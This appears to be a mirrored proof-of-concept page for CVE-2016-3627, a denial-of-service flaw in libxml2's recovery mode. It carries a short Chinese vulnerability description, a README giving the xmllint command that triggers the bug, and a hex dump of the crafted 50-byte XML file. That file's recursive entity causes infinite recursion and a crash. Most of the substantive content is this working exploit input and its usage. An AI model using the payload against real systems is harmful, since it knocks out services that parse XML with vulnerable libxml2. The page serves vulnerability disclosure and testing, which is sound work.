Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-3627 PoC — Libxml2 拒绝服务漏洞

Source
https://github.com/Oneton429/CVE-2016-3627
Associated Vulnerability
Title:Libxml2 拒绝服务漏洞 (CVE-2016-3627)
Description:Libxml2是GNOME项目组所研发的一个基于C语言的用来解析XML文档的函数库,它支持多种编码格式、Xpath解析、Well-formed和valid验证等。 libxml2 2.9.3及之前版本的tree.c文件中的‘xmlStringGetNodeList’函数存在安全漏洞。当程序工作在恢复模式时,攻击者可借助特制的XML文档利用该漏洞造成拒绝服务(无限递归,栈损坏和应用程序崩溃)。
Description
PoC of CVE-2016-3627
Readme
# [CVE-2016-3627](https://www.cve.org/CVERecord?id=CVE-2016-3627)

Usage: `xmllint --valid --recover CVE-2016-3627.xml`

```shell
> xxd CVE-2016-3627.xml
00000000: 3c21 444f 4354 5950 455b 3c21 454e 5449  <!DOCTYPE[<!ENTI
00000010: 5459 594e 2726 594e 3b27 3e3c 2145 4e54  TYYN'&YN;'><!ENT
00000020: 4954 5968 3e30 3cef bfbd 2053 3d22 2659  ITYh>0<... S="&Y
00000030: 4e3b                                     N;
```
File Snapshot

 [4.0K]  /data/pocs/d39650341d41b594ededec4958916b616e727d2b
├── [  50]  CVE-2016-3627.xml
└── [ 416]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.